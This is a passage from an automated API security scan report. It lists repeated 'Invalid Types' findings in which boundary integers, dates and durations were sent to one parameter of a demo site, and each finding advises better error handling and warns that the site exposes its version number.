in the code processing this \ninput.\nIssue Number #1972\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# P1Y2M3DT10H30M12.3S\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1973\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1999-05-31T13:20:00.000-05:00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1974\nScan Invalid TypesSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1999-05-31\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1975\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1976\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1977\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -2147483647Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1978\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -32768\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1979Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 127\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1980\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1981\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1982\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1983\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1984\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1985\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 294967295\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1986\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 65535\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- 